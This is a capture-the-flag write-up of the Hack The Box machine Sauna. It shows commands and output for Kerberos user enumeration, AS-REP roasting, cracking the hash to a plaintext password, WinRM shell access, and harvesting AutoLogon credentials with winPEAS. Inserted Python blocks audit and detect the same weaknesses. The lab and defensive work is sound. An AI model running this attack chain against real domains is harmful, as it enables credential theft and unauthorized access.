This is a Windows machine (Sauna) from Hack The Box.
# Nmap 7.94 scan initiated Fri Aug 25 01:40:28 2023 as: nmap -sV -sC -oA sauna 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.28s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-08-25 12:40:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-08-25T12:41:11
|_ start_date: N/A
|_clock-skew: 6h59m58s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug 25 01:41:59 2023 -- 1 IP address (1 host up) scanned in 91.07 seconds
- Enumerating SMB on port 445
┌──(kali㉿kali)-[~/HTB]
└─$ crackmapexec smb 10.10.10.175
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing LDAP protocol database
[*] Initializing SMB protocol database
[*] Initializing MSSQL protocol database
[*] Initializing RDP protocol database
[*] Initializing FTP protocol database
[*] Initializing WINRM protocol database
[*] Initializing SSH protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB 10.10.10.175 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
Domain name is EGOTISTICAL-BANK.LOCAL.
Enumerating shares
└─$ crackmapexec smb 10.10.10.175 --shares
SMB 10.10.10.175 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.175 445 SAUNA [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
┌──(kali㉿kali)-[~/HTB]
└─$ crackmapexec smb 10.10.10.175 --shares -u '' -p ''
[*] completed: 100.00% (1/1)
SMB 10.10.10.175 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.175 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\:
SMB 10.10.10.175 445 SAUNA [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/HTB]
└─$ smbmap -H 10.10.10.175 -u ''
SMBMap - Samba Share Enumerator | Shawn Evans - [email protected]
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) on line 947
Traceback (most recent call last):
File "/usr/bin/smbmap", line 33, in <module>
sys.exit(load_entry_point('smbmap==1.9.1', 'console_scripts', 'smbmap')())
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/smbmap/smbmap.py", line 1412, in main
host = [ host for host in share_drives_list.keys() ][0]
^^^^^^^^^^^^^^^^^^^^^^
AttributeError: 'bool' object has no attribute 'keys'
Identified the machine as a domain controller for the domain EGOTISTICAL-BANK.LOCAL (nmap displays it as EGOTISTICAL-BANK.LOCAL0.).
Try rpcclient
┌──(kali㉿kali)-[~/HTB]
└─$ rpcclient 10.10.10.175 -U ''
Password for [WORKGROUP\]:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
┌──(kali㉿kali)-[~/HTB]
└─$
Enumerating the web page on port 80, we see a “The team” section, which gives us possible usernames.
Identified the users as:
- Fergus Smith
- Shaun Coins
- Sophie Driver
- Hugo Bear
- Bowie Taylor
- Steven Kerb
Used ChatGPT to generate possible username formats from these names and saved them in users.txt, which will be our user list.
Searching LDAP to try and get usernames:
┌──(kali㉿kali)-[~/HTB]
└─$ ldapsearch -x -H ldap://10.10.10.175 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
┌──(kali㉿kali)-[~/HTB]
└─$
ldapsearch part 2, but we did not get any usernames:
┌──(kali㉿kali)-[~/HTB]
└─$ ldapsearch -x -H ldap://10.10.10.175 -b 'DC=EGOTISTICAL-BANK,DC=LOCAL' -s sub
# extended LDIF
#
# LDAPv3
# base <DC=EGOTISTICAL-BANK,DC=LOCAL> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# EGOTISTICAL-BANK.LOCAL
dn: DC=EGOTISTICAL-BANK,DC=LOCAL
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=EGOTISTICAL-BANK,DC=LOCAL
instanceType: 5
whenCreated: 20200123054425.0Z
whenChanged: 20230825072320.0Z
subRefs: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
subRefs: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
subRefs: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
uSNCreated: 4099
dSASignature:: AQAAACgAAAAAAAAAAAAAAAAAAAAAAAAAQL7gs8Yl7ESyuZ/4XESy7A==
uSNChanged: 98336
name: EGOTISTICAL-BANK
objectGUID:: 7AZOUMEioUOTwM9IB/gzYw==
creationTime: 133374218005585776
forceLogoff: -9223372036854775808
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000
lockoutThreshold: 0
maxPwdAge: -36288000000000
minPwdAge: -864000000000
minPwdLength: 7
modifiedCountAtLastProm: 0
nextRid: 1000
pwdProperties: 1
pwdHistoryLength: 24
objectSid:: AQQAAAAAAAUVAAAA+o7VsIowlbg+rLZG
serverState: 1
uASCompat: 1
modifiedCount: 1
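Added example (not part of the original notes): a Python decoder for the password and lockout policy attributes returned in the dump above, with the audit findings they imply. The sample LDIF is constructed from the values shown on this page; AD stores the interval attributes as negative counts of 100-nanosecond units, with INT64_MIN meaning never, so the raw numbers need translating before they say anything.

```python
import re

# AD stores interval attributes as a negative count of 100-nanosecond units;
# INT64_MIN is the special "never / not set" value.
NEVER = -(2 ** 63)
TICKS_PER_SECOND = 10_000_000

# pwdProperties bit flags (MS-SAMR DOMAIN_PASSWORD_INFORMATION).
PWD_PROPERTIES = {
    0x01: "DOMAIN_PASSWORD_COMPLEX",
    0x02: "DOMAIN_PASSWORD_NO_ANON_CHANGE",
    0x04: "DOMAIN_PASSWORD_NO_CLEAR_CHANGE",
    0x08: "DOMAIN_LOCKOUT_ADMINS",
    0x10: "DOMAIN_PASSWORD_STORE_CLEARTEXT",
    0x20: "DOMAIN_REFUSE_PASSWORD_CHANGE",
}

# Constructed sample: the policy attributes copied from the ldapsearch output above.
SAMPLE_LDIF = """\
dn: DC=EGOTISTICAL-BANK,DC=LOCAL
forceLogoff: -9223372036854775808
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000
lockoutThreshold: 0
maxPwdAge: -36288000000000
minPwdAge: -864000000000
minPwdLength: 7
pwdProperties: 1
pwdHistoryLength: 24
"""


def parse_ldif_ints(ldif):
    """Collect every 'attribute: integer' line of an LDIF entry into a dict."""
    attrs = {}
    for line in ldif.splitlines():
        match = re.match(r"^([A-Za-z]+): (-?\d+)$", line)
        if match:
            attrs[match.group(1)] = int(match.group(2))
    return attrs


def interval_to_seconds(value):
    """Convert an AD interval attribute to whole seconds; None means 'never'."""
    if value == NEVER:
        return None
    return abs(value) // TICKS_PER_SECOND


def decode_policy(attrs):
    """Translate the raw attribute values into human units."""
    def in_units(name, divisor):
        seconds = interval_to_seconds(attrs[name])
        return None if seconds is None else seconds // divisor

    return {
        "max_password_age_days": in_units("maxPwdAge", 86400),
        "min_password_age_days": in_units("minPwdAge", 86400),
        "min_password_length": attrs["minPwdLength"],
        "password_history_length": attrs["pwdHistoryLength"],
        "lockout_threshold": attrs["lockoutThreshold"],
        "lockout_duration_minutes": in_units("lockoutDuration", 60),
        "lockout_window_minutes": in_units("lockOutObservationWindow", 60),
        "force_logoff_seconds": in_units("forceLogoff", 1),
        "password_properties": [
            name for bit, name in PWD_PROPERTIES.items() if attrs["pwdProperties"] & bit
        ],
    }


def assess_policy(policy):
    """Audit findings a defender would raise about this policy."""
    findings = []
    if policy["lockout_threshold"] == 0:
        findings.append(
            "lockoutThreshold is 0: accounts never lock out, so password guessing against "
            "the KDC is not throttled (kerbrute's lockout warning does not apply here)"
        )
    if policy["min_password_length"] < 14:
        findings.append(
            f"minPwdLength is {policy['min_password_length']}: below the 14 characters "
            "commonly recommended for domain accounts"
        )
    if "DOMAIN_PASSWORD_COMPLEX" not in policy["password_properties"]:
        findings.append("password complexity is not enforced")
    if policy["max_password_age_days"] is None:
        findings.append("maxPwdAge is 'never': passwords do not expire")
    return findings


if __name__ == "__main__":
    decoded = decode_policy(parse_ldif_ints(SAMPLE_LDIF))
    for key, value in decoded.items():
        print(f"{key:28} {value}")
    for finding in assess_policy(decoded):
        print("[!]", finding)
```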
- Use a tool called kerbrute to try and identify valid users. It can also do a password spray without generating event code 4624, i.e. quietly.
- Event code 4624 – Event code 4624 corresponds to a log entry in the Windows Security event log and indicates a successful logon event. It is a crucial event for forensic analysts and security professionals as it provides evidence of successful logon activity. Monitoring for an unusually high number of 4624 events, especially in a short time frame or from unfamiliar locations, might indicate a security concern such as brute-force attacks or unauthorized access.
- Kerbrute can be found at https://github.com/ropnop/kerbrute
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ chmod +x kerbrute
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ ls
kerbrute sauna.gnmap sauna.nmap sauna.xml users.txt
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ ./kerbrute
Version: v1.0.3 (9dad6e1) - 08/25/23 - Ronnie Flathers @ropnop
This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts
Usage:
kerbrute [command]
Available Commands:
bruteforce Bruteforce username:password combos, from a file or stdin
bruteuser Bruteforce a single user's password from a wordlist
help Help about any command
passwordspray Test a single password against a list of users
userenum Enumerate valid domain usernames via Kerberos
version Display version info and quit
Flags:
--dc string The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
--delay int Delay in millisecond between each attempt. Will always use single thread if set
-d, --domain string The full domain to use (e.g. contoso.com)
-h, --help help for kerbrute
-o, --output string File to write logs to. Optional.
--safe Safe mode. Will abort if any user comes back as locked out. Default: FALSE
-t, --threads int Threads to use (default 10)
-v, --verbose Log failures and errors
Use "kerbrute [command] --help" for more information about a command.
- Using kerbrute:
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ ./kerbrute userenum --dc 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL users.txt
Version: v1.0.3 (9dad6e1) - 08/25/23 - Ronnie Flathers @ropnop
2023/08/25 06:39:06 > Using KDC(s):
2023/08/25 06:39:06 > 10.10.10.175:88
2023/08/25 06:39:07 > [+] VALID USERNAME: [email protected]
2023/08/25 06:39:07 > [+] VALID USERNAME: [email protected]
2023/08/25 06:39:08 > Done! Tested 57 usernames (2 valid) in 1.870 seconds
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$
Use Impacket. The example scripts live in /usr/share/doc/python3-impacket/examples:
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ls
addcomputer.py getArch.py kintercept.py ntfs-read.py rpcdump.py smbserver.py
atexec.py Get-GPPPassword.py lookupsid.py ntlmrelayx.py rpcmap.py sniffer.py
changepasswd.py GetNPUsers.py machine_role.py ping6.py sambaPipe.py sniff.py
dcomexec.py getPac.py mimikatz.py ping.py samrdump.py split.py
dpapi.py getST.py mqtt_check.py psexec.py secretsdump.py ticketConverter.py
DumpNTLMInfo.py getTGT.py mssqlclient.py raiseChild.py services.py ticketer.py
esentutl.py GetUserSPNs.py mssqlinstance.py rbcd.py smbclient.py tstool.py
exchanger.py goldenPac.py net.py rdp_check.py smbexec.py wmiexec.py
findDelegation.py karmaSMB.py netview.py registry-read.py smbpasswd.py wmipersist.py
GetADUsers.py keylistattack.py nmapAnswerMachine.py reg.py smbrelayx.py wmiquery.py
Use the Impacket script GetNPUsers.py. This tool from the Impacket suite abuses a misconfiguration in Active Directory (accounts with Kerberos pre-authentication disabled, UF_DONT_REQUIRE_PREAUTH) that lets an attacker retrieve crackable AS-REP hashes for valid usernames without holding any account credentials.
Using GetNPUsers.py. But first we have to add the domain to our hosts file.
Tried GetNPUsers.py on administrator and fsmith:
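Added example (not part of the original notes or of Impacket): a defender-side audit of userAccountControl that finds the enabled accounts with pre-authentication disabled, the condition GetNPUsers.py relies on, and the value to write back to fix them. The account list is constructed; only Administrator's value (0x10200) comes from the dcsync output later on this page.

```python
# userAccountControl bit flags (the subset relevant here; ADS_USER_FLAG_ENUM values).
UAC_FLAGS = {
    0x00000002: "ACCOUNTDISABLE",
    0x00000020: "PASSWD_NOTREQD",
    0x00000200: "NORMAL_ACCOUNT",
    0x00001000: "WORKSTATION_TRUST_ACCOUNT",
    0x00002000: "SERVER_TRUST_ACCOUNT",
    0x00010000: "DONT_EXPIRE_PASSWORD",
    0x00040000: "SMARTCARD_REQUIRED",
    0x00080000: "TRUSTED_FOR_DELEGATION",
    0x00200000: "USE_DES_KEY_ONLY",
    0x00400000: "DONT_REQUIRE_PREAUTH",
    0x00800000: "PASSWORD_EXPIRED",
}
ACCOUNTDISABLE = 0x2
DONT_REQUIRE_PREAUTH = 0x400000

# LDAP filter an administrator can run against the DC (e.g. with ldapsearch) to list the
# same accounts directly: 1.2.840.113556.1.4.803 is the bitwise-AND matching rule and
# 4194304 is DONT_REQUIRE_PREAUTH in decimal.
ROASTABLE_FILTER = (
    "(&(objectCategory=person)(objectClass=user)"
    "(userAccountControl:1.2.840.113556.1.4.803:=4194304)"
    "(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"
)

# Constructed directory export. Administrator's value is the 00010200 shown in the dcsync
# output on this page; the rest are made up: fsmith as the enabled account without
# pre-auth, a disabled leftover with the same flag, and the DC's machine account.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "Administrator", "userAccountControl": 0x10200},
    {"sAMAccountName": "fsmith", "userAccountControl": 0x410200},
    {"sAMAccountName": "svc_loanmgr", "userAccountControl": 0x10200},
    {"sAMAccountName": "oldcontractor", "userAccountControl": 0x400202},
    {"sAMAccountName": "SAUNA$", "userAccountControl": 0x82000},
]


def decode_uac(value):
    """Names of the set userAccountControl bits, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def find_asrep_roastable(accounts):
    """Enabled accounts that skip Kerberos pre-authentication (what GetNPUsers.py looks for)."""
    return [
        acct["sAMAccountName"]
        for acct in accounts
        if acct["userAccountControl"] & DONT_REQUIRE_PREAUTH
        and not acct["userAccountControl"] & ACCOUNTDISABLE
    ]


def remediated_uac(value):
    """The userAccountControl value to write back so the account requires pre-auth again."""
    return value & ~DONT_REQUIRE_PREAUTH


if __name__ == "__main__":
    for acct in SAMPLE_ACCOUNTS:
        print(f"{acct['sAMAccountName']:14} {acct['userAccountControl']:#010x} "
              + " ".join(decode_uac(acct["userAccountControl"])))
    print("AS-REP roastable:", find_asrep_roastable(SAMPLE_ACCOUNTS))
```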
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py EGOTISTICAL-BANK.LOCAL/administrator
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate administrator, getting its TGT
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
On fsmith:
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py EGOTISTICAL-BANK.LOCAL/fsmith
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate fsmith, getting its TGT
[email protected]:70311dacc7f5a33fcf57295a8fc26f5c$66be8037a4348d14299f81c374f5264f7bdde85c821ef83864e7afa14348a85aac6eb3ec4ed01392815fb12cc9fcb420e9c68d9169a4243fcee3412e3802910ced76fe5c03f6a6a66009a7d0a53ec889e43e08dd61cb3ec8abaa772f24249381551e53e695d9a3906569a0de98b4d755da5654bc6ec6fbb27ba896208078eb160bc0326d223fa3c763e6340d5e47b4bad4d508662a273296480d59b79b3fdff972fce916bdf04afcbaea487cb355301e3588f468ed33dbef6fb980e50ad974b03689e98811d97b9806acf95b4fcdf05cfed8401a1282a43cb834538a7548df6e0674cbca3e139de2088c2593109f858300e758a6cae98dfd0f947336b7c22fd4
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
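Added example (not part of the original notes) that covers both the kerbrute run and the GetNPUsers.py request above from the detection side. Neither creates a logon session, which is why no 4624 appears; the KDC audits each TGT request as event 4768, so the records below are constructed 4768 lines (result code 0x6 for an unknown principal, pre-authentication type 0 for a TGT issued without pre-auth), with addresses and timing mirroring the kerbrute output.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Event 4768 fields we key on: KDC result codes (RFC 4120) and the pre-authentication type.
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"   # requested account does not exist
KDC_SUCCESS = "0x0"
PREAUTH_NONE = "0"                    # TGT issued without any pre-authentication

WINDOW = timedelta(seconds=60)
ENUM_THRESHOLD = 5                    # distinct unknown names from one client inside WINDOW

# Constructed sample of 4768 records flattened to one line each:
#   <utc time> <result code> <pre-auth type> <client address> <target account>
# The burst from 10.10.14.18 mirrors the kerbrute run; the 0x0/type-0 line is the
# AS-REP GetNPUsers.py obtained for fsmith; the last two lines are a user's typo and
# a normal logon (pre-auth type 2 = PA-ENC-TIMESTAMP) from a workstation.
SAMPLE_4768 = """\
2023-08-25T12:39:06Z 0x6 - ::ffff:10.10.14.18 fergus.smith
2023-08-25T12:39:06Z 0x6 - ::ffff:10.10.14.18 f.smith
2023-08-25T12:39:06Z 0x6 - ::ffff:10.10.14.18 smithf
2023-08-25T12:39:07Z 0x6 - ::ffff:10.10.14.18 shaun.coins
2023-08-25T12:39:07Z 0x6 - ::ffff:10.10.14.18 scoins
2023-08-25T12:39:07Z 0x0 0 ::ffff:10.10.14.18 fsmith
2023-08-25T12:39:08Z 0x6 - ::ffff:10.10.14.18 hugo.bear
2023-08-25T12:45:00Z 0x6 - ::ffff:10.10.10.50 fsmtih
2023-08-25T12:45:09Z 0x0 2 ::ffff:10.10.10.50 fsmith
"""


def parse_events(text):
    """Split the flattened records into dicts with a real timestamp."""
    events = []
    for line in text.splitlines():
        ts, result, preauth, client, target = line.split()
        events.append({
            "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "result": result, "preauth": preauth,
            "client": client, "target": target,
        })
    return events


def detect_user_enumeration(events, window=WINDOW, threshold=ENUM_THRESHOLD):
    """Flag each client that requested TGTs for many non-existent principals in one window.

    Enumeration sends one AS-REQ per candidate name, so wrong guesses appear as a dense
    run of 0x6 failures from one source; a sliding window finds the widest qualifying run."""
    by_client = defaultdict(list)
    for ev in events:
        if ev["result"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            by_client[ev["client"]].append(ev)

    alerts = []
    for client, probes in by_client.items():
        probes.sort(key=lambda e: e["time"])
        best, start = None, 0
        for end in range(len(probes)):
            while probes[end]["time"] - probes[start]["time"] > window:
                start += 1
            names = {e["target"] for e in probes[start:end + 1]}
            if len(names) >= threshold and (best is None or len(names) > len(best["unknown_names"])):
                best = {"client": client, "unknown_names": sorted(names),
                        "first": probes[start]["time"], "last": probes[end]["time"]}
        if best:
            alerts.append(best)
    return alerts


def detect_asrep_without_preauth(events):
    """(client, account) pairs where a TGT was issued with pre-auth type 0.

    Any such event means the account has DONT_REQUIRE_PREAUTH set and its AS-REP can be
    cracked offline; one from an address that is not the user's own workstation is the roast."""
    return [(ev["client"], ev["target"]) for ev in events
            if ev["result"] == KDC_SUCCESS and ev["preauth"] == PREAUTH_NONE]


if __name__ == "__main__":
    parsed = parse_events(SAMPLE_4768)
    for alert in detect_user_enumeration(parsed):
        print(f"[!] enumeration from {alert['client']}: {len(alert['unknown_names'])} "
              f"unknown names between {alert['first']} and {alert['last']}")
    for client, account in detect_asrep_without_preauth(parsed):
        print(f"[!] TGT for {account} issued to {client} without pre-authentication")
```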
We have the hash and now we use hashcat to try and crack it. To find the hash mode, use:
./hashcat --example-hashes | grep asrep
./hashcat --example-hashes | less
then search for asrep with / asrep.
We get hash mode 18200:
Hash mode #18200
Name................: Kerberos 5, etype 23, AS-REP
Category............: Network Protocol
Slow.Hash...........: No
Password.Len.Min....: 0
Password.Len.Max....: 256
Salt.Type...........: Embedded
Salt.Len.Min........: 0
Salt.Len.Max........: 256
Kernel.Type(s)......: pure, optimized
Example.Hash.Format.: plain
Example.Hash........: [email protected]:3e156ada591263b8a...102ac [Truncated, use --mach for full length]
Example.Pass........: hashcat
Benchmark.Mask......: ?b?b?b?b?b?b?b
Autodetect.Enabled..: Yes
Self.Test.Enabled...: Yes
Potfile.Enabled.....: Yes
Custom.Plugin.......: No
Plaintext.Encoding..: ASCII, HEX
Copy the hash into a file called sauna
└─$ cat sauna
[email protected]:70311dacc7f5a33fcf57295a8fc26f5c$...
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$
Run hashcat
┌──(kali㉿kali)-[/usr/bin]
└─$ ./hashcat -m 18200 /home/kali/HTB/Sauna/sauna /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Get the password – Thestrokes23
[email protected]:70311dacc7f5a33fcf57295a8fc26f5c$...:Thestrokes23
Run crackmapexec
┌──(kali㉿kali)-[/usr/bin]
└─$ crackmapexec smb 10.10.10.175 --shares -u fsmith -p Thestrokes23
SMB 10.10.10.175 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.175 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23
SMB 10.10.10.175 445 SAUNA [+] Enumerated shares
SMB 10.10.10.175 445 SAUNA Share Permissions Remark
SMB 10.10.10.175 445 SAUNA ----- ----------- ------
SMB 10.10.10.175 445 SAUNA ADMIN$ Remote Admin
SMB 10.10.10.175 445 SAUNA C$ Default share
SMB 10.10.10.175 445 SAUNA IPC$ READ Remote IPC
SMB 10.10.10.175 445 SAUNA NETLOGON READ Logon server share
SMB 10.10.10.175 445 SAUNA print$ READ Printer Drivers
SMB 10.10.10.175 445 SAUNA RICOH Aficio SP 8300DN PCL 6 We cant print money
SMB 10.10.10.175 445 SAUNA SYSVOL READ Logon server share
Try crackmapexec winrm (Windows Remote Management), which tells us whether we can get onto the box; it does (Pwn3d!).
┌──(kali㉿kali)-[/usr/bin]
└─$ crackmapexec winrm 10.10.10.175 -u fsmith -p Thestrokes23
SMB 10.10.10.175 5985 SAUNA [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
HTTP 10.10.10.175 5985 SAUNA [*] http://10.10.10.175:5985/wsman
WINRM 10.10.10.175 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)
We use evil-winrm
┌──(kali㉿kali)-[/usr/bin]
└─$ evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd..
*Evil-WinRM* PS C:\Users\FSmith> ls
Directory: C:\Users\FSmith
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 1/23/2020 10:01 AM Desktop
d-r--- 1/24/2020 10:40 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
*Evil-WinRM* PS C:\Users\FSmith> cd Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> ls
Directory: C:\Users\FSmith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/25/2023 12:24 AM 34 user.txt
*Evil-WinRM* PS C:\Users\FSmith\Desktop> cat user.txt
d3e2c4cf72ed6d184ea0905f9f67ef1d
*Evil-WinRM* PS C:\Users\FSmith\Desktop>
Upload and run winPEAS
*Evil-WinRM* PS C:\Users\FSmith\Documents> upload /home/kali/HTB/Sauna/winPEASx64.exe
Info: Uploading /home/kali/HTB/Sauna/winPEASx64.exe to C:\Users\FSmith\Documents\winPEASx64.exe
Data: 3183956 bytes of 3183956 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\FSmith\Documents> ./winPEASx64.exe
The following credentials are of interest:
Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
Check the domain user. Note the AutoLogon entry says svc_loanmanager, but the actual account is svc_loanmgr:
*Evil-WinRM* PS C:\Users\FSmith\Documents> net user /domain svc_loanmgr
User name svc_loanmgr
Full Name L Manager
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/24/2020 4:48:31 PM
Password expires Never
Password changeable 1/25/2020 4:48:31 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\FSmith\Documents>
We go for BloodHound. First we install it:
──(kali㉿kali)-[~]
└─$ sudo apt install bloodhound
[sudo] password for kali:
Sorry, try again.
[sudo] password for kali:
Download SharpHound.exe from GitHub: https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors
Upload SharpHound and run it on the Windows machine:
*Evil-WinRM* PS C:\Users\FSmith\Documents> upload /home/kali/HTB/Sauna/SharpHound.exe
Info: Uploading /home/kali/HTB/Sauna/SharpHound.exe to C:\Users\FSmith\Documents\SharpHound.exe
Data: 1395368 bytes of 1395368 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\FSmith\Documents> ./SharpHound.exe
2023-08-25T13:19:26.1522551-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2023-08-25T13:19:26.3241396-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-08-25T13:19:26.3553912-07:00|INFORMATION|Initializing SharpHound at 1:19 PM on 8/25/2023
2023-08-25T13:19:26.5429038-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL
2023-08-25T13:19:50.6366275-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-08-25T13:19:50.8397517-07:00|INFORMATION|Beginning LDAP search for EGOTISTICAL-BANK.LOCAL
2023-08-25T13:19:50.9022664-07:00|INFORMATION|Producer has finished, closing LDAP channel
2023-08-25T13:19:50.9022664-07:00|INFORMATION|LDAP channel closed, waiting for consumers
Download the zip file:
*Evil-WinRM* PS C:\Users\FSmith\Documents> ls
Directory: C:\Users\FSmith\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/25/2023 1:20 PM 11690 20230825132046_BloodHound.zip
-a---- 8/25/2023 1:18 PM 1046528 SharpHound.exe
-a---- 8/25/2023 12:58 PM 2387968 winPEASx64.exe
-a---- 8/25/2023 1:20 PM 8601 ZDFkMDEyYjYtMmE1ZS00YmY3LTk0OWItYTM2OWVmMjc5NDVk.bin
*Evil-WinRM* PS C:\Users\FSmith\Documents> download 20230825132046_BloodHound.zip
Launch bloodhound
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ bloodhound
But before that, we need to start neo4j and set its password:
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ sudo neo4j console
Directories in use:
home: /usr/share/neo4j
